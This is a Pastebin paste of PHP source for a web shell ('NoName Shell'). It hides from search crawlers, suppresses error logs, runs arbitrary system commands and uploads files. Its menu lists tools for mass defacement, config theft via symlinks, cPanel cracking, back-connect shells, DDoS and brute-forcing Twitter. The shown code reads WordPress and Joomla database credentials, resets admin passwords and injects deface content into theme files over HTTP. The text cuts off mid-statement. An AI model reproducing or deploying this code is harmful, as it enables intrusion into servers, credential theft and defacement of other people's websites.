API tools faq
paste
Guest User

Untitled

a guest
Sep 6th, 2018
139
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 64.25 KB | None | 0 0
raw download clone embed print report
  1. session_start();
  2. error_reporting(0);
  3. set_time_limit(0);
  4. @set_magic_quotes_runtime(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11. $color = "#00ff00";
  12. $default_action = 'FilesMan';
  13. $default_use_ajax = true;
  14. $default_charset = 'UTF-8';
  15. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  16. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  17. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  18. header('HTTP/1.0 404 Not Found');
  19. exit;
  20. }
  21. }
  22.  
  23. function login_shell() {
  24. ?>
  25. <html>
  26. <head>
  27. <title>Lysteriouss</title>
  28. <style type="text/css">
  29. html {
  30. background: url('https://www.exilie.team/1.png');
  31. background-size: cover;
  32. background-attachment: fixed;
  33. background-repeat: no-repeat;
  34. color: green;
  35. }
  36. header {
  37. color: green;
  38. margin: 10px auto;
  39. }
  40. input[type=password] {
  41. width: 250px;
  42. height: 25px;
  43. color: red;
  44. background: #000000;
  45. border: 1px solid #ffffff;
  46. padding: 5px;
  47. margin-left: 20px;
  48. text-align: center;
  49. }
  50. </style>
  51. </head>
  52. <header>
  53. <center><img src="http://i.imgur.com/fW1hCGC.png" width="30%" height="50%"></img></center>
  54. </header>
  55. <form method="post">
  56. <center><input type="password" name="pass"><center>
  57. </form>
  58. <?php
  59. exit;
  60. }
  61. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  62. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  63. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  64. else
  65. login_shell();
  66. ?>
  67. <html>
  68. <head>
  69. <title>Lysteriouss</title>
  70. <meta name='author' content='Shun403'>
  71. <meta charset="UTF-8">
  72. <style type='text/css'>
  73. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  74. html {
  75. background: url('https://www.exilie.team/2.jpg');
  76. background-size: cover;
  77. background-attachment: fixed;
  78. background-repeat: no-repeat;
  79. color: #ffffff;
  80. font-family: 'Share Tech Mono';
  81. font-size: 12px;
  82. width: 100%;
  83. }
  84. li {
  85. display: inline;
  86. margin: 1px;
  87. padding: 1px;
  88. }
  89.  
  90. #menu a {
  91. padding:2px 10px;
  92. margin:0;
  93. background:#222222;
  94. text-decoration:none;
  95. letter-spacing:2px;
  96. padding: 2px 10px;
  97. margin: 0;
  98. background: #222222;
  99. text-decoration: none;
  100. letter-spacing: 2px;
  101. border-radius: 2px;
  102. border-bottom: 2px solid #B5AFAF;
  103. border-top: 2px solid #B5AFAF;
  104. border-right: 2px solid darkblue;
  105. border-left: 2px solid darkblue;
  106. }
  107. #menu a:hover {
  108. background:#180000;
  109. border-bottom:0px solid #333333;
  110. border-top:0px solid #333333;
  111. }
  112. table tr:first-child{
  113. background: red;
  114. text-align: center;
  115. color: white;
  116. }
  117. table, th, td {
  118. border-collapse:collapse;
  119. font-family: Tahoma, Geneva, sans-serif;
  120. background: transparent;
  121. font-family: 'Share Tech Mono';
  122. font-size: 13px;
  123. }
  124. .table_home, .th_home, .td_home {
  125. border: 1px solid blue;
  126. }
  127. th {
  128. padding: 10px;
  129. }
  130. a {
  131. color: #ffffff;
  132. text-decoration: none;
  133. }
  134. a:hover {
  135. color: blue;
  136. text-decoration: underline;
  137. }
  138. b {
  139. color: blue;
  140. }
  141. input[type=text], input[type=password],input[type=submit] {
  142. background: transparent;
  143. color: #ffffff;
  144. border: 1px solid #ffffff;
  145. margin: 5px auto;
  146. padding-left: 5px;
  147. font-family: 'Share Tech Mono';
  148. font-size: 13px;
  149. }
  150. input[type=submit] {
  151. background: transparent;
  152. color: #ffffff;
  153. border: 1px solid #ffffff;
  154. margin: 5px auto;
  155. padding-left: 5px;
  156. font-family: 'Share Tech Mono';
  157. font-size: 13px;
  158. cursor:pointer;
  159. }
  160. textarea {
  161. border: 1px solid #ffffff;
  162. width: 100%;
  163. height: 400px;
  164. padding-left: 5px;
  165. margin: 10px auto;
  166. resize: none;
  167. background: transparent;
  168. color: #ffffff;
  169. font-family: 'Share Tech Mono';
  170. font-size: 13px;
  171. }
  172. select {
  173. width: 152px;
  174. background: #000000;
  175. color: blue;
  176. border: 1px solid #ffffff;
  177. margin: 5px auto;
  178. padding-left: 5px;
  179. font-family: 'Share Tech Mono';
  180. font-size: 13px;
  181. }
  182. option:hover {
  183. background: blue;
  184. color: #000000;
  185. }
  186. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  187. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  188. .infoweb {
  189. border-right: 1px solid #00FFFF;
  190. }
  191. </style>
  192. </head>
  193. <?php
  194.  
  195. function w($dir,$perm) {
  196. if(!is_writable($dir)) {
  197. return "<font color=red>".$perm."</font>";
  198. } else {
  199. return "<font color=blue>".$perm."</font>";
  200. }
  201. }
  202. function r($dir,$perm) {
  203. if(!is_readable($dir)) {
  204. return "<font color=red>".$perm."</font>";
  205. } else {
  206. return "<font color=blue>".$perm."</font>";
  207. }
  208. }
  209. function exe($cmd) {
  210. if(function_exists('system')) {
  211. @ob_start();
  212. @system($cmd);
  213. $buff = @ob_get_contents();
  214. @ob_end_clean();
  215. return $buff;
  216. } elseif(function_exists('exec')) {
  217. @exec($cmd,$results);
  218. $buff = "";
  219. foreach($results as $result) {
  220. $buff .= $result;
  221. } return $buff;
  222. } elseif(function_exists('passthru')) {
  223. @ob_start();
  224. @passthru($cmd);
  225. $buff = @ob_get_contents();
  226. @ob_end_clean();
  227. return $buff;
  228. } elseif(function_exists('shell_exec')) {
  229. $buff = @shell_exec($cmd);
  230. return $buff;
  231. }
  232. }
  233. function perms($file){
  234. $perms = fileperms($file);
  235. if (($perms & 0xC000) == 0xC000) {
  236. // Socket
  237. $info = 's';
  238. } elseif (($perms & 0xA000) == 0xA000) {
  239. // Symbolic Link
  240. $info = 'l';
  241. } elseif (($perms & 0x8000) == 0x8000) {
  242. // Regular
  243. $info = '-';
  244. } elseif (($perms & 0x6000) == 0x6000) {
  245. // Block special
  246. $info = 'b';
  247. } elseif (($perms & 0x4000) == 0x4000) {
  248. // Directory
  249. $info = 'd';
  250. } elseif (($perms & 0x2000) == 0x2000) {
  251. // Character special
  252. $info = 'c';
  253. } elseif (($perms & 0x1000) == 0x1000) {
  254. // FIFO pipe
  255. $info = 'p';
  256. } else {
  257. // Unknown
  258. $info = 'u';
  259. }
  260. // Owner
  261. $info .= (($perms & 0x0100) ? 'r' : '-');
  262. $info .= (($perms & 0x0080) ? 'w' : '-');
  263. $info .= (($perms & 0x0040) ?
  264. (($perms & 0x0800) ? 's' : 'x' ) :
  265. (($perms & 0x0800) ? 'S' : '-'));
  266. // Group
  267. $info .= (($perms & 0x0020) ? 'r' : '-');
  268. $info .= (($perms & 0x0010) ? 'w' : '-');
  269. $info .= (($perms & 0x0008) ?
  270. (($perms & 0x0400) ? 's' : 'x' ) :
  271. (($perms & 0x0400) ? 'S' : '-'));
  272. // World
  273. $info .= (($perms & 0x0004) ? 'r' : '-');
  274. $info .= (($perms & 0x0002) ? 'w' : '-');
  275. $info .= (($perms & 0x0001) ?
  276. (($perms & 0x0200) ? 't' : 'x' ) :
  277. (($perms & 0x0200) ? 'T' : '-'));
  278. return $info;
  279. }
  280. function hdd($s) {
  281. if($s >= 1073741824)
  282. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  283. elseif($s >= 1048576)
  284. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  285. elseif($s >= 1024)
  286. return sprintf('%1.2f',$s / 1024 ) .' KB';
  287. else
  288. return $s .' B';
  289. }
  290. function ambilKata($param, $kata1, $kata2){
  291. if(strpos($param, $kata1) === FALSE) return FALSE;
  292. if(strpos($param, $kata2) === FALSE) return FALSE;
  293. $start = strpos($param, $kata1) + strlen($kata1);
  294. $end = strpos($param, $kata2, $start);
  295. $return = substr($param, $start, $end - $start);
  296. return $return;
  297. }
  298. if(get_magic_quotes_gpc()) {
  299. function idx_ss($array) {
  300. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  301. }
  302. $_POST = idx_ss($_POST);
  303. }
  304.  
  305. error_reporting(0);
  306. @ini_set('error_log',NULL);
  307. @ini_set('log_errors',0);
  308. @ini_set('max_execution_time',0);
  309. @set_time_limit(0);
  310. @set_magic_quotes_runtime(0);
  311. if(isset($_GET['dir'])) {
  312. $dir = $_GET['dir'];
  313. chdir($dir);
  314. } else {
  315. $dir = getcwd();
  316. }
  317. $dir = str_replace("\\","/",$dir);
  318. $scdir = explode("/", $dir);
  319. $freespace = hdd(disk_free_space("/"));
  320. $total = hdd(disk_total_space("/"));
  321. $used = $total - $freespace;
  322. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=blue>OFF</font>";
  323. $ds = @ini_get("disable_functions");
  324. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  325. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  326. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  327. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  328. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  329. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
  330. if(!function_exists('posix_getegid')) {
  331. $user = @get_current_user();
  332. $uid = @getmyuid();
  333. $gid = @getmygid();
  334. $group = "?";
  335. } else {
  336. $uid = @posix_getpwuid(posix_geteuid());
  337. $gid = @posix_getgrgid(posix_getegid());
  338. $user = $uid['name'];
  339. $uid = $uid['uid'];
  340. $group = $gid['name'];
  341. $gid = $gid['gid'];
  342. }
  343. ECHO "<BR>";
  344. echo "<center><font size='20px' color='red'>NoName Shell</font>";
  345. echo "<br>";
  346. echo "System: ".php_uname()."<br>";
  347. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  348. echo "Storage Space: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
  349. echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")<br>";
  350. echo "Disable Functions: $show_ds<br>";
  351. echo "Safe Mode: $sm<br>";
  352. echo "&nbsp;<a href='?' style='border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>H O M E</a>&nbsp;<a href='?shell&do=kill' style='border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>K I L L </a>&nbsp;<a href='?byee&do=logout' style='color:red;border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>L O G O U T</a>";
  353. echo "</td></table>";
  354. echo "<div id='menu'>";
  355. echo "<hr color='red'>";
  356. echo "<hr color='blue'>";
  357. echo "<center>";
  358. echo "<ul>";
  359. echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
  360. echo "<li> <a href='?dir=$dir&do=cmd'>Command</a> </li>";
  361. echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Tools</a> </li>";
  362. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
  363. echo "<li> <a href='?dir=$dir&do=configv2'>Config V.2</a> </li>";
  364. echo "<li> <a href='?dir=$dir&do=symconfig'>SymConfig</a> </li>";
  365. echo "<li> <a href='?dir=$dir&do=jumping'>Jumping</a> </li>";
  366. echo "<li> <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> </li>";
  367. echo "<li> <a href='?dir=$dir&do=symlink'>Symlink</a></li>";
  368. echo "<li> <a href='?dir=$dir&do=symlink2'>Symlink V.2</a> </li>";
  369. echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
  370. echo "<li> <a href='?dir=$dir&do=defacerid'>Defacer.id</a> </li><br><br>";
  371. echo "<li> <a href='?dir=$dir&do=vhost'>Bypass vHost</a> </li>";
  372. echo "<li> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
  373. echo "<li> <a href='?dir=$dir&do=auto_dwp'>Auto Deface WordPress</a> </li>";
  374. echo "<li> <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> </li>";
  375. echo "<li> <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> </li>";
  376. echo "<li> <a href='?dir=$dir&do=decode'>Encode/Decode</a> </li>";
  377. echo "<li> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li><br><br>";
  378. echo "<li> <a href='?dir=$dir&do=vb'>VB Index Changer</a> </li>";
  379. echo "<li> <a href='?dir=$dir&do=multiconfig'>Multi Config</a> </li>";
  380. echo "<li> <a href='?dir=$dir&do=dbdump'>DB Dump</a> </li>";
  381. echo "<li> <a href='?dir=$dir&do=code'>Inject Code</a> </li>";
  382. echo "<li> <a href='?dir=$dir&do=passwbypass'>Bypass Etc/Passw</a> </li>";
  383. echo "<li> <a href='?dir=$dir&do=csrfup'>Csrf Exploiter</a> </li>";
  384. echo "<li> <a href='?dir=$dir&do=hijack_wp'>Wp Auto Hijack</a> </li>";
  385. echo "<li> <a href='?dir=$dir&do=cpftp_auto'>Cpanel/Ftp Auto Deface</a></li><br><br>";
  386. echo "<li> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
  387. echo "<li> <a href='?dir=$dir&do=adminer'>Adminer</a> </li>";
  388. echo "<li> <a href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
  389. echo "<li> <a href='?dir=$dir&do=ddosattack'>DDoS</a> </li>";
  390. echo "<li> <a href='?dir=$dir&do=hashid'>HashID</a> </li>";
  391. echo "<li> <a href='?dir=$dir&do=reverse'>ReverseIP</a> </li>";
  392. echo "<li> <a href='?dir=$dir&do=adfin'>Admin Finder</a> </li>";
  393. echo "<li> <a href='?dir=$dir&do=whmcsdecod'>WHMCS Decoder</a> </li>";
  394. echo "<li> <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>";
  395. echo "<li> <a href='?dir=$dir&do=hash'>Hash Generate</a> </li><br><br>";
  396. echo "<li> <a href='?dir=$dir&do=ports'>Port Scanner</a></li>";
  397. echo "<li> <a href='?dir=$dir&do=domains'>Domains Viewer</a></li>";
  398. echo "<li> <a href='?dir=$dir&do=network'>Back Connect</a> </li>";
  399. echo "<li> <a href='?dir=$dir&do=backconnect'>Back Connect V.2</a> </li>";
  400. echo "<li> <a href='?dir=$dir&do=bypass'>Disable Functions</a> </li>";
  401. echo "<li> <a href='?dir=$dir&do=ngindexx'>NginDexer</a> </li>";
  402. echo "<li> <a href='?dir=$dir&do=twitterbf'>BruteForce Twitter</a></li><br><br>";
  403. echo "<li> <a href='?dir=$dir&do=contact'>Contact Me</a></li>";
  404. echo "<li> <a href='?dir=$dir&do=about'>About Me</a></li>";
  405. echo "</ul>";
  406. echo "</center>";
  407. echo "<hr color='blue'>";
  408. echo "<hr color='red'>";
  409. echo "</div>";
  410. echo "<br>";
  411. echo "Current DIR: ";
  412. foreach($scdir as $c_dir => $cdir) {
  413. echo "<a href='?dir=";
  414. for($i = 0; $i <= $c_dir; $i++) {
  415. echo $scdir[$i];
  416. if($i != $c_dir) {
  417. echo "/";
  418. }
  419. }
  420. echo "'>$cdir</a>/";
  421. }
  422. echo "[ ".w($dir, perms($dir))." ]";
  423. echo "<br>";
  424. echo "<br>";
  425. if($_GET['do'] == 'upload') {
  426. echo "<center>";
  427. if($_POST['upload']) {
  428. if($_POST['tipe_upload'] == 'biasa') {
  429. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  430. $act = "<font color=blue>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  431. } else {
  432. $act = "<font color=red>failed to upload file</font>";
  433. }
  434. } else {
  435. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  436. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  437. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  438. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  439. $act = "<font color=blue>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  440. } else {
  441. $act = "<font color=red>failed to upload file</font>";
  442. }
  443. } else {
  444. $act = "<font color=red>failed to upload file</font>";
  445. }
  446. }
  447. }
  448. echo "Upload File:
  449. <form method='post' enctype='multipart/form-data'>
  450. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  451. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  452. <input type='file' name='ix_file'>
  453. <input type='submit' value='upload' name='upload'>
  454. </form>";
  455. echo $act;
  456. echo "</center>";
  457. } elseif($_GET['do'] == 'ngindexx') {
  458. {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = 